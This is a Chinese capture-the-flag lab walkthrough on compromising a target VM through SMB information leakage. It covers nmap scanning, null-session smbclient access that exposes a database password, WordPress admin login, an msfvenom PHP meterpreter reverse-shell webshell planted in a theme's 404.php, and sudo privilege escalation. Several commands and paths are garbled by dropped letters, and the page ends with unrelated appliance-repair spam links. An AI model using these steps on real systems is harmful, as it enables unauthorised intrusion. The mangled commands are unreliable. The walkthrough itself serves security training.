CTF-SMB信息泄露【简单易懂】
目录
SMB介绍
实验环境
信息探测
分析探测结果
针对SMB协议弱点分析
1.针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看;
2.针对SMB协议远程溢出漏洞进行分析
针对http协议弱点分析
1.浏览器查看网站
2.使用dirb nikto探测
3.寻找突破点,目标登录后台,上传ebshell
4.优化终端
5.查找用户名cat /etc/passd
6.查找密码在共享目录下的敏感文件,提升权限
SMB介绍
SMB协议是基于TCP-NETBIOS下的,一般端口使用为139,445
SMB协议,计算机可以访问网络资源,下载对应的资源文件
实验环境
kali 192.168.20.128
靶机 192.168.20.129
链接https://pan.baidu./s/1inGR9A628icBnqcsHCnPYQ
提取码4c5l
信息探测
nmap -sV ip 挖掘开放服务信息
nmap -A -v -T4 挖掘靶场全部信息
nmap -sV 192.168.20.129
分析探测结果
每一个服务对应计算机的一个端口,用来进行通信。常用端口0-1023端口,在扫描结果中查找特殊端口
针对特殊端口进行探测,尤其对开发大端口的http服务进行排查
针对SMB协议弱点分析
1.针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看;
smbclient -L ip
smbclient '\ipshare$'
print$和IPC$没有什么利用价值
get 敏感文件
发现疑似数据库密码的数据(Admin;togieMYSQL12345^^)
远程登录3306端口不行
远程登录22端口不行
2.针对SMB协议远程溢出漏洞进行分析
searchsploit samba版本号
发现没有远程溢出漏洞
针对http协议弱点分析
1.浏览器查看网站
2.使用dirb nikto探测
2.使用dirb nikto探测
打开查看
利用密码登录
登陆网站
3.寻找突破点,目标登录后台,上传ebshell
制作ebshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.20.128 lport=4444 -f ra
制作ebshell.php
启动监听
上传ebshell
update file
获取反弹shell
选择tentyfifteen的原因
http://192.168.20.129/ordpress/p-content/themes/tentyfifteen/404.php
4.优化终端
python -c "import pty;pty.span('/bin/bash')"
5.查找用户名cat /etc/passd
6.查找密码在共享目录下的敏感文件,提升权限
su 用户名
12345是之前deets.txt文件里的密码
sudo-l
sudo su
查看flag.txt(根目录下没找到flag.txt,所以查看proof.txt)
空调维修
- 温岭冰箱全国统一服务热线-全国统一人工【7X2
- 荆州速热热水器维修(荆州热水器维修)
- 昆山热水器故障码5ER-昆山热水器故障码26
- 温岭洗衣机24小时服务电话—(7X24小时)登记报
- 统帅热水器售后维修服务电话—— (7X24小时)登
- 阳江中央空调统一电话热线-阳江空调官方售后电
- 乌鲁木齐阳春燃气灶厂家服务热线
- 珠海许昌集成灶售后服务电话-全国统一人工【
- 乌鲁木齐中央空调维修服务专线-乌鲁木齐中央空
- 新沂热水器故障电话码维修-新沂热水器常见故障
- 诸城壁挂炉24小时服务热线电话
- 靖江空调24小时服务电话-——售后维修中心电话
- 空调室外滴水管维修(空调室外排水管维修)
- 九江壁挂炉400全国服务电话-(7X24小时)登记报修
- 热水器故障码f.22怎么解决-热水器f0故障解决方法
- 营口热水器售后维修服务电话—— 全国统一人工